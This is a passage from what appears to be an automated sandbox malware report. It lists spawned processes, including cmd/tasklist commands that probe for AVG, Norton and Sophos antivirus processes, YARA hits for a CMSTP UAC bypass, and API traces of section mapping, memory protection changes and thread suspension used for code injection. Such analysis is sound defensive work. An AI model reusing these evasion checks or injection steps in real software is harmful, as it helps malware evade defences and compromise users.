                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                                                                          Imagebase:0x7ff6abfd0000
                                                                                                                                          File size:106'496 bytes
                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:25
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\find.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:find /I "avgui.exe"
                                                                                                                                          Imagebase:0x7ff628a60000
                                                                                                                                          File size:17'920 bytes
                                                                                                                                          MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:26
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                                                                          Imagebase:0x7ff65f9f0000
                                                                                                                                          File size:289'792 bytes
                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:27
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:28
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                                                                          Imagebase:0x7ff6abfd0000
                                                                                                                                          File size:106'496 bytes
                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:29
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\find.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:find /I "nswscsvc.exe"
                                                                                                                                          Imagebase:0x7ff628a60000
                                                                                                                                          File size:17'920 bytes
                                                                                                                                          MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:30
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                          Imagebase:0x7ff65f9f0000
                                                                                                                                          File size:289'792 bytes
                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:31
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:32
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                          Imagebase:0x7ff6abfd0000
                                                                                                                                          File size:106'496 bytes
                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:33
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\find.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:find /I "sophoshealth.exe"
                                                                                                                                          Imagebase:0x7ff628a60000
                                                                                                                                          File size:17'920 bytes
                                                                                                                                          MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:34
                                                                                                                                          Start time:16:18:03
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:167'432 bytes
                                                                                                                                          MD5 hash:0588CE0C39DA3283E779C1D5B21D283B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000022.00000002.2326879519.0000000009316000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Has exited:true

                                                                                                                                          Disassembly

                                                                                                                                          Reset < >

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:1.2%
                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                            Signature Coverage:41%
                                                                                                                                            Total number of Nodes:117
                                                                                                                                            Total number of Limit Nodes:11
                                                                                                                                            execution_graph 13843 25003c3 13844 25003d1 13843->13844 13859 2500d13 13844->13859 13846 250095c 13847 2500569 GetPEB 13849 25005e6 13847->13849 13848 2500524 13848->13846 13848->13847 13862 2500ad3 13849->13862 13852 2500647 CreateThread 13853 250061f 13852->13853 13874 2500983 GetPEB 13852->13874 13858 2500857 13853->13858 13870 2500fd3 GetPEB 13853->13870 13855 2500947 TerminateProcess 13855->13846 13856 2500ad3 4 API calls 13856->13858 13858->13855 13860 2500d20 13859->13860 13872 2500d33 GetPEB 13859->13872 13860->13848 13863 2500ae9 CreateToolhelp32Snapshot 13862->13863 13865 2500b20 Thread32First 13863->13865 13866 2500619 13863->13866 13865->13866 13867 2500b47 13865->13867 13866->13852 13866->13853 13867->13866 13868 2500b7e Wow64SuspendThread 13867->13868 13869 2500ba8 CloseHandle 13867->13869 13868->13869 13869->13867 13871 25006a1 13870->13871 13871->13856 13871->13858 13873 2500d4e 13872->13873 13873->13860 13875 25009dc 13874->13875 13876 2500a3c CreateThread 13875->13876 13877 2500a89 13875->13877 13876->13875 13878 25011b3 13876->13878 13881 254e378 13878->13881 13882 254e487 13881->13882 13883 254e39d 13881->13883 13893 254f653 13882->13893 13917 2550bfa 13883->13917 13886 254e3b5 13887 2550bfa LoadLibraryA 13886->13887 13892 25011b8 13886->13892 13888 254e3f7 13887->13888 13889 2550bfa LoadLibraryA 13888->13889 13890 254e413 13889->13890 13891 2550bfa LoadLibraryA 13890->13891 13891->13892 13894 2550bfa LoadLibraryA 13893->13894 13895 254f676 13894->13895 13896 2550bfa LoadLibraryA 13895->13896 13897 254f68e 13896->13897 13898 2550bfa LoadLibraryA 13897->13898 13899 254f6ac 13898->13899 13900 254f6c1 VirtualAlloc 13899->13900 13911 254f6d5 13899->13911 13902 254f6ef 13900->13902 13900->13911 13901 2550bfa LoadLibraryA 13904 254f76d 13901->13904 13902->13901 13906 254f948 13902->13906 13903 2550bfa LoadLibraryA 13905 254f7c3 13903->13905 13904->13905 13904->13911 13921 2550a01 13904->13921 13905->13903 13905->13906 13909 254f825 13905->13909 13908 254fa06 VirtualFree 13906->13908 13915 254f9a5 13906->13915 13908->13911 13909->13906 13916 254f887 13909->13916 13949 254e7e3 13909->13949 13911->13892 13912 254f870 13912->13906 13956 254e8de 13912->13956 13915->13915 13916->13906 13925 254fd83 13916->13925 13918 2550c11 13917->13918 13919 2550c38 13918->13919 13975 254ecff 13918->13975 13919->13886 13924 2550a16 13921->13924 13922 2550a8c LoadLibraryA 13923 2550a96 13922->13923 13923->13904 13924->13922 13924->13923 13926 254fdbe 13925->13926 13927 254fe05 NtCreateSection 13926->13927 13928 254fe2a 13926->13928 13948 2550432 13926->13948 13927->13928 13927->13948 13929 254febf NtMapViewOfSection 13928->13929 13928->13948 13939 254fedf 13929->13939 13930 2550208 VirtualAlloc 13937 255024a 13930->13937 13931 2550a01 LoadLibraryA 13931->13939 13932 2550a01 LoadLibraryA 13933 2550166 13932->13933 13933->13930 13933->13932 13938 2550204 13933->13938 13961 2550a9f 13933->13961 13934 25502fb VirtualProtect 13935 25503c6 VirtualProtect 13934->13935 13936 255031b 13934->13936 13947 25503f5 13935->13947 13936->13935 13946 25503a0 VirtualProtect 13936->13946 13937->13934 13944 25502e8 NtMapViewOfSection 13937->13944 13937->13948 13938->13930 13939->13931 13939->13933 13940 2550a9f LoadLibraryA 13939->13940 13939->13948 13940->13939 13941 2550540 13943 2550548 CreateThread 13941->13943 13941->13948 13943->13948 13944->13934 13944->13948 13946->13936 13947->13941 13947->13948 13965 25507b4 13947->13965 13948->13906 13950 2550a01 LoadLibraryA 13949->13950 13951 254e7f7 13950->13951 13952 2550a9f LoadLibraryA 13951->13952 13955 254e7ff 13951->13955 13953 254e817 13952->13953 13954 2550a9f LoadLibraryA 13953->13954 13953->13955 13954->13955 13955->13912 13957 2550a01 LoadLibraryA 13956->13957 13958 254e8f4 13957->13958 13959 2550a9f LoadLibraryA 13958->13959 13960 254e904 13959->13960 13960->13916 13963 2550aba 13961->13963 13964 2550bd0 13961->13964 13963->13964 13969 254eea4 13963->13969 13964->13933 13968 25507dc 13965->13968 13966 25509ce 13966->13941 13967 2550a9f LoadLibraryA 13967->13968 13968->13966 13968->13967 13970 254eee9 13969->13970 13973 254eec3 13969->13973 13971 2550a01 LoadLibraryA 13970->13971 13972 254eef6 13970->13972 13971->13972 13972->13964 13973->13970 13973->13972 13974 2550a9f LoadLibraryA 13973->13974 13974->13973 13976 254ed1f 13975->13976 13978 254ee04 13975->13978 13977 254eea4 LoadLibraryA 13976->13977 13976->13978 13977->13978 13978->13918

                                                                                                                                            Executed Functions

                                                                                                                                            Function 0254FD83 Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 0254FE1C
                                                                                                                                            • NtMapViewOfSection.NTDLL(?,00000000), ref: 0254FEC4
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02550238
                                                                                                                                            • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 025502ED
                                                                                                                                            • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 0255030A
                                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 025503AD
                                                                                                                                            • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 025503E0
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 02550551
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1248616170-0
                                                                                                                                            • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                            • Instruction ID: 8331c6de686b6805ea60710273b07a1cad6d6db07fb6c6b7302caeed84c1aa9e
                                                                                                                                            • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                            • Instruction Fuzzy Hash: 9F428871608361AFDB24CF28C854B6BBBE9BF88714F04492EFD859B291E730E944CB55
                                                                                                                                            Function 02500AD3 Relevance: 6.1, APIs: 4, Instructions: 100threadprocessCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 187 2500ad3-2500b1a CreateToolhelp32Snapshot 190 2500bf0-2500bf3 187->190 191 2500b20-2500b41 Thread32First 187->191 192 2500b47-2500b4d 191->192 193 2500bdc-2500beb 191->193 194 2500bbc-2500bd6 192->194 195 2500b4f-2500b55 192->195 193->190 194->192 194->193 195->194 196 2500b57-2500b76 195->196 196->194 199 2500b78-2500b7c 196->199 200 2500b94-2500ba3 199->200 201 2500b7e-2500b92 Wow64SuspendThread 199->201 202 2500ba8-2500bba CloseHandle 200->202 201->202 202->194
                                                                                                                                            APIs
                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,02500619,?,00000001,?,81EC8B55,000000FF), ref: 02500B11
                                                                                                                                            • Thread32First.KERNEL32(00000000,0000001C), ref: 02500B3D
                                                                                                                                            • Wow64SuspendThread.KERNEL32(00000000), ref: 02500B90
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02500BBA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1849706056-0
                                                                                                                                            • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                            • Instruction ID: e10ca440ff832ec7e0f6439c5db4703e497e0ee367b24d4c3ab2f1617150cc43
                                                                                                                                            • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                            • Instruction Fuzzy Hash: F5410E71600108AFDB18DF58C890FADBBB6EF88304F10C168E6159B7D4DB74AE45CB94
                                                                                                                                            Function 025003C3 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 399threadCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 203 25003c3-250052b call 2500973 call 2500f73 call 2501123 call 2500d13 212 2500531-2500538 203->212 213 250095c-250095f 203->213 214 2500543-2500547 212->214 215 2500569-25005e4 GetPEB 214->215 216 2500549-2500567 call 2500e93 214->216 217 25005ef-25005f3 215->217 216->214 220 25005f5-2500609 217->220 221 250060b-250061d call 2500ad3 217->221 220->217 226 2500647-2500668 CreateThread 221->226 227 250061f-2500645 221->227 228 250066b-250066f 226->228 227->228 230 2500930-250095a TerminateProcess 228->230 231 2500675-25006a8 call 2500fd3 228->231 230->213 231->230 235 25006ae-25006fd 231->235 237 2500708-250070e 235->237 238 2500710-2500716 237->238 239 2500756-250075a 237->239 240 2500718-2500727 238->240 241 2500729-250072d 238->241 242 2500760-250076d 239->242 243 2500828-250091b call 2500ad3 call 2500973 call 2500f73 239->243 240->241 244 2500754 241->244 245 250072f-250073d 241->245 246 2500778-250077e 242->246 269 2500920-250092a 243->269 270 250091d 243->270 244->237 245->244 247 250073f-2500751 245->247 250 2500780-250078e 246->250 251 25007ae-25007b1 246->251 247->244 252 2500790-250079f 250->252 253 25007ac 250->253 254 25007b4-25007bb 251->254 252->253 256 25007a1-25007aa 252->256 253->246 254->243 258 25007bd-25007c6 254->258 256->251 258->243 261 25007c8-25007d8 258->261 263 25007e3-25007ef 261->263 265 2500820-2500826 263->265 266 25007f1-250081e 263->266 265->254 266->263 269->230 270->269
                                                                                                                                            APIs
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 02500666
                                                                                                                                            • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 0250095A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateProcessTerminateThread
                                                                                                                                            • String ID: v"3f
                                                                                                                                            • API String ID: 1197810419-73601935
                                                                                                                                            • Opcode ID: 096e607a30dfc29cd575bf7d30eaa5a995d47dbfd4d34719b5295a21263b7965
                                                                                                                                            • Instruction ID: 95cbec5c20d2b3547885c6df35bb7e53396639ab46c7c36e862d4da2c15ec271
                                                                                                                                            • Opcode Fuzzy Hash: 096e607a30dfc29cd575bf7d30eaa5a995d47dbfd4d34719b5295a21263b7965
                                                                                                                                            • Instruction Fuzzy Hash: 4912C3B5E00219DFDB14CF98C990BADBBB2FF88304F2486A9D515AB385C7746A41CF58
                                                                                                                                            Function 02500983 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103threadCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 271 2500983-25009da GetPEB 272 25009e5-25009e9 271->272 273 2500a89-2500a90 272->273 274 25009ef-25009fa 272->274 275 2500a9b-2500a9f 273->275 276 2500a00-2500a17 274->276 277 2500a84 274->277 279 2500ab0-2500ab7 275->279 280 2500aa1-2500aae 275->280 281 2500a19-2500a3a 276->281 282 2500a3c-2500a54 CreateThread 276->282 277->272 285 2500ac0-2500ac5 279->285 286 2500ab9-2500abb 279->286 280->275 283 2500a58-2500a60 281->283 282->283 283->277 288 2500a62-2500a7f 283->288 286->285 288->277
                                                                                                                                            APIs
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02500A4F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateThread
                                                                                                                                            • String ID: ,
                                                                                                                                            • API String ID: 2422867632-3772416878
                                                                                                                                            • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                            • Instruction ID: a18b985ba08ae757930e2584beebd0d4d1cd9f10ed4e53b5ea79027b54d8e23b
                                                                                                                                            • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                            • Instruction Fuzzy Hash: 5941C474A00209EFDB04CF99C994BAEBBB1BF88314F208598D5156B3C1C771AE81CF98
                                                                                                                                            Function 02550A01 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 290 2550a01-2550a14 291 2550a16-2550a19 290->291 292 2550a2c-2550a36 290->292 293 2550a1b-2550a1e 291->293 294 2550a45-2550a51 292->294 295 2550a38-2550a40 292->295 293->292 296 2550a20-2550a2a 293->296 297 2550a54-2550a59 294->297 295->294 296->292 296->293 298 2550a8c-2550a93 LoadLibraryA 297->298 299 2550a5b-2550a66 297->299 302 2550a96-2550a9a 298->302 300 2550a82-2550a86 299->300 301 2550a68-2550a80 call 25510cf 299->301 300->297 304 2550a88-2550a8a 300->304 301->300 306 2550a9b-2550a9d 301->306 304->298 304->302 306->302
                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,?,?), ref: 02550A93
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                            • String ID: .dll
                                                                                                                                            • API String ID: 1029625771-2738580789
                                                                                                                                            • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                            • Instruction ID: edb4ef9b49d6a3656b8d85a0404d971ff804d4f01a9182ad4175d37850486828
                                                                                                                                            • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                            • Instruction Fuzzy Hash: AB210A356002A58FEB11CFB8C454B6E7FE4BF09324F18416EEC0587681D770E845CB84
                                                                                                                                            Function 0254F653 Relevance: 2.8, APIs: 2, Instructions: 325memoryCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 307 254f653-254f6b7 call 2550bfa * 3 314 254f6e1 307->314 315 254f6b9-254f6bb 307->315 316 254f6e4-254f6ee 314->316 315->314 317 254f6bd-254f6bf 315->317 317->314 318 254f6c1-254f6d3 VirtualAlloc 317->318 319 254f6d5-254f6dc 318->319 320 254f6ef-254f712 call 255106f call 2551093 318->320 319->314 321 254f6de 319->321 326 254f714-254f74a call 2550d67 call 2550c3d 320->326 327 254f75c-254f775 call 2550bfa 320->327 321->314 336 254f750-254f756 326->336 337 254f9ab-254f9b4 326->337 327->314 332 254f77b 327->332 334 254f781-254f787 332->334 338 254f7c3-254f7cc 334->338 339 254f789-254f78f 334->339 336->327 336->337 340 254f9b6-254f9b9 337->340 341 254f9bb-254f9c3 337->341 343 254f825-254f830 338->343 344 254f7ce-254f7d4 338->344 342 254f791-254f794 339->342 340->341 346 254f9f2 340->346 341->346 347 254f9c5-254f9f0 call 2551093 341->347 350 254f796-254f79b 342->350 351 254f7a8-254f7aa 342->351 348 254f832-254f83b call 254e947 343->348 349 254f849-254f84c 343->349 345 254f7d8-254f7f3 call 2550bfa 344->345 367 254f7f5-254f7fd 345->367 368 254f812-254f823 345->368 354 254f9f6-254fa16 call 2551093 VirtualFree 346->354 347->354 358 254f9a7 348->358 370 254f841-254f847 348->370 349->358 359 254f852-254f85b 349->359 350->351 356 254f79d-254f7a6 350->356 351->338 357 254f7ac-254f7ba call 2550a01 351->357 379 254fa1c-254fa1e 354->379 380 254fa18 354->380 356->342 356->351 371 254f7bf-254f7c1 357->371 358->337 365 254f861-254f868 359->365 366 254f85d 359->366 372 254f898-254f89c 365->372 373 254f86a-254f873 call 254e7e3 365->373 366->365 367->358 375 254f803-254f80c 367->375 368->343 368->345 370->365 371->334 377 254f8a2-254f8c4 372->377 378 254f93e-254f941 372->378 384 254f875-254f87b 373->384 385 254f881-254f88a call 254e8de 373->385 375->358 375->368 377->358 393 254f8ca-254f8dd call 255106f 377->393 382 254f993-254f995 call 254fd83 378->382 383 254f943-254f946 378->383 379->316 380->379 392 254f99a-254f99b 382->392 383->382 386 254f948-254f94b 383->386 384->358 384->385 385->372 400 254f88c-254f892 385->400 390 254f964-254f975 call 254f444 386->390 391 254f94d-254f94f 386->391 405 254f986-254f991 call 254ef10 390->405 406 254f977-254f983 call 254fa23 390->406 391->390 396 254f951-254f954 391->396 397 254f99c-254f9a3 392->397 408 254f901-254f93a 393->408 409 254f8df-254f8e3 393->409 401 254f956-254f959 396->401 402 254f95b-254f962 call 25505f1 396->402 397->358 403 254f9a5 397->403 400->358 400->372 401->397 401->402 402->392 403->403 405->392 406->405 408->358 419 254f93c 408->419 409->408 413 254f8e5-254f8e8 409->413 413->378 414 254f8ea-254f8ff call 2550e72 413->414 414->419 419->378
                                                                                                                                            APIs
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0254F6CD
                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 0254FA11
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Virtual$AllocFree
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2087232378-0
                                                                                                                                            • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                            • Instruction ID: 80ccbaca46290a10869e280b3b116d358514d417ddbdb71e3e89ba9419c8c979
                                                                                                                                            • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                            • Instruction Fuzzy Hash: 7EB1E571500B06BBDB259E68CC80FABFBE9FF4931CF10051AE94996950DB31E550CFAA

                                                                                                                                            Non-executed Functions

                                                                                                                                            Function 025132C0 Relevance: 134.6, Strings: 106, Instructions: 2102COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_2500000_SET_UP.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $!$"$"$"$#$%$%$%$%$'$($)$)$*$*$+$+$+$,$-$-$.$/$/$1$2$2$3$5$5$7$8$8$8$9$9$;$;$=$?$@$@$@$B$B$C$D$D$D$F$H$I$I$J$J$K$L$L$L$M$N$N$N$O$P$R$X$Z$Z$]$`$`$a$b$d$eb$f$h$i$i$j$j$k$l$l$n$p$q$r$r$s$t$t$u$v$w$w$x$y$z${$|$}$~$~
                                                                                                                                            • API String ID: 0-1858622422
                                                                                                                                            • Opcode ID: 6b697dce1f09686039ce7f42cfd623d9e4e89870b72689b23e587473ef7bb46b
                                                                                                                                            • Instruction ID: 844368dba2ab40162ef79527f025e0c8ecc571b8e80c815c1ba6ae1be71331b6
                                                                                                                                            • Opcode Fuzzy Hash: 6b697dce1f09686039ce7f42cfd623d9e4e89870b72689b23e587473ef7bb46b
